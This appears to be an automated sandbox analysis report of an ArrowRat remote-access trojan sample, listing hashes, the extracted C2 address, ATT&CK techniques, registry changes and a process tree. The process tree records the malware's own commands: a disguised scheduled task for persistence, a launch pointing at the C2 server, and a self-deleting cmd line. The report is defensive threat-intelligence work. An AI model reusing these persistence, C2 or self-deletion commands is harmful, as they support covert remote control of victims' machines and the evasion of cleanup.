arrowrat | e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

Resubmissions

11-11-2022 23:03

221111-216jyscc66 10

11-11-2022 22:52

221111-2ttltacc22 10

Analysis

max time kernel
57s
max time network
121s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11-11-2022 23:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MRH.exe
Size

1.9MB
MD5

18585735c8866b21e2723a6f020bafd0
SHA1

afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256

e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA512

88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8
SSDEEP

49152:t82Cp8xP5AE/L4C0m9eKQr10XxpQQTf+4G7zsdtW:9E7eQqpIsG

Score

10^/10

arrowrat client persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

213.239.219.58:1337

Mutex

nPxRArUjc

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Executes dropped EXE 1 IoCs

pid	Process
4588	Quoko tace wesa.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	MRH.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4588 set thread context of 2940	4588	Quoko tace wesa.exe	96
PID 2940 set thread context of 3588	2940	InstallUtil.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3068	schtasks.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{83069346-D1C7-4C73-85E4-27490396404D}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
400	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
3916	MRH.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
4588	Quoko tace wesa.exe
2940	InstallUtil.exe
2940	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2940	InstallUtil.exe
Token: SeShutdownPrivilege	3456	explorer.exe
Token: SeCreatePagefilePrivilege	3456	explorer.exe
Token: SeShutdownPrivilege	3456	explorer.exe
Token: SeCreatePagefilePrivilege	3456	explorer.exe
Token: SeShutdownPrivilege	3456	explorer.exe
Token: SeCreatePagefilePrivilege	3456	explorer.exe
Token: SeShutdownPrivilege	3456	explorer.exe
Token: SeCreatePagefilePrivilege	3456	explorer.exe
Token: SeShutdownPrivilege	3456	explorer.exe
Token: SeCreatePagefilePrivilege	3456	explorer.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe
3456	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2940	InstallUtil.exe
3692	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3916 wrote to memory of 3068	3916	MRH.exe	81
PID 3916 wrote to memory of 3068	3916	MRH.exe	81
PID 3916 wrote to memory of 3068	3916	MRH.exe	81
PID 3916 wrote to memory of 4588	3916	MRH.exe	83
PID 3916 wrote to memory of 4588	3916	MRH.exe	83
PID 3916 wrote to memory of 4588	3916	MRH.exe	83
PID 3916 wrote to memory of 1964	3916	MRH.exe	84
PID 3916 wrote to memory of 1964	3916	MRH.exe	84
PID 3916 wrote to memory of 1964	3916	MRH.exe	84
PID 1964 wrote to memory of 2764	1964	cmd.exe	86
PID 1964 wrote to memory of 2764	1964	cmd.exe	86
PID 1964 wrote to memory of 2764	1964	cmd.exe	86
PID 1964 wrote to memory of 400	1964	cmd.exe	87
PID 1964 wrote to memory of 400	1964	cmd.exe	87
PID 1964 wrote to memory of 400	1964	cmd.exe	87
PID 4588 wrote to memory of 2848	4588	Quoko tace wesa.exe	95
PID 4588 wrote to memory of 2848	4588	Quoko tace wesa.exe	95
PID 4588 wrote to memory of 2848	4588	Quoko tace wesa.exe	95
PID 4588 wrote to memory of 2940	4588	Quoko tace wesa.exe	96
PID 4588 wrote to memory of 2940	4588	Quoko tace wesa.exe	96
PID 4588 wrote to memory of 2940	4588	Quoko tace wesa.exe	96
PID 4588 wrote to memory of 2940	4588	Quoko tace wesa.exe	96
PID 4588 wrote to memory of 2940	4588	Quoko tace wesa.exe	96
PID 2940 wrote to memory of 3456	2940	InstallUtil.exe	97
PID 2940 wrote to memory of 3456	2940	InstallUtil.exe	97
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99
PID 2940 wrote to memory of 3588	2940	InstallUtil.exe	99

C:\Users\Admin\AppData\Local\Temp\MRH.exe
"C:\Users\Admin\AppData\Local\Temp\MRH.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3916
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
  2⤵
  - Creates scheduled task(s)
  PID:3068
- C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
  "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:2848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Enumerates connected drives
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3456
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
      4⤵
      PID:3588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:400

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3692

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3168

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
479.1MB

MD5
622241166b92ca9e9bde2d05caa6c349

SHA1
25914ef0d258416c21f4903dbb7f7c92614f0f7b

SHA256
3b3791671149bb359743c2c89ba472d55553882d5fdb58a681b6eff6bb1a01e8

SHA512
31111aa7f6095de9a2aa658dfd9e24f34d768df9ecb0d139795bc9ae6f54ce1695d15b889c58908323a2e0a4bf510314e87806e3058cfc2f7b71175214eb7878

Download Submit
C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
481.8MB

MD5
1fd38016e7f047eaa789fb2c48f2ad62

SHA1
911eef5009248056e5e3ba31336894357777455d

SHA256
8ab1a41b95a97495fb50e6daedd13f2aca0082ce8655f1829aa41aba25f4a493

SHA512
57c829dd05c5edeb91f14a6cdfb5c006726e1b6a3426add12bed6ccb509c9baec647169dcc2fc87587246fe8455a36ea9976092c5c848907e1cd26c46ea8e1d3

Download Submit
memory/2940-162-0x0000000005130000-0x000000000513A000-memory.dmp

Filesize
40KB

Download
memory/2940-151-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2940-153-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2940-157-0x0000000005140000-0x00000000051DC000-memory.dmp

Filesize
624KB

Download
memory/2940-161-0x00000000053C0000-0x0000000005452000-memory.dmp

Filesize
584KB

Download
memory/2940-156-0x0000000005650000-0x0000000005BF4000-memory.dmp

Filesize
5.6MB

Download
memory/3168-175-0x00000227EA3F0000-0x00000227EA4F0000-memory.dmp

Filesize
1024KB

Download
memory/3168-174-0x00000227D78C0000-0x00000227D78E0000-memory.dmp

Filesize
128KB

Download
memory/3168-182-0x00000227DA200000-0x00000227DA220000-memory.dmp

Filesize
128KB

Download
memory/3168-184-0x00000227DA040000-0x00000227DA060000-memory.dmp

Filesize
128KB

Download
memory/3588-164-0x0000000006650000-0x00000000066A0000-memory.dmp

Filesize
320KB

Download
memory/3588-163-0x0000000005D90000-0x0000000005DF6000-memory.dmp

Filesize
408KB

Download
memory/3588-160-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/3916-132-0x0000000002B07000-0x00000000033FC000-memory.dmp

Filesize
9.0MB

Download
memory/3916-133-0x0000000003409000-0x00000000035D0000-memory.dmp

Filesize
1.8MB

Download
memory/3916-134-0x0000000002B07000-0x00000000033FC000-memory.dmp

Filesize
9.0MB

Download
memory/3916-141-0x0000000003409000-0x00000000035D0000-memory.dmp

Filesize
1.8MB

Download
memory/4588-144-0x000000000347E000-0x0000000003645000-memory.dmp

Filesize
1.8MB

Download
memory/4588-148-0x0000000010030000-0x000000001021F000-memory.dmp

Filesize
1.9MB

Download
memory/4588-145-0x0000000002A75000-0x000000000336A000-memory.dmp

Filesize
9.0MB

Download
memory/4588-146-0x000000000347E000-0x0000000003645000-memory.dmp

Filesize
1.8MB

Download
memory/4588-147-0x0000000010030000-0x000000001021F000-memory.dmp

Filesize
1.9MB

Download
memory/4588-140-0x0000000002A75000-0x000000000336A000-memory.dmp

Filesize
9.0MB

Download
memory/4588-155-0x000000000347E000-0x0000000003645000-memory.dmp

Filesize
1.8MB

Download
memory/4588-154-0x0000000002A70000-0x0000000002A76000-memory.dmp

Filesize
24KB

Download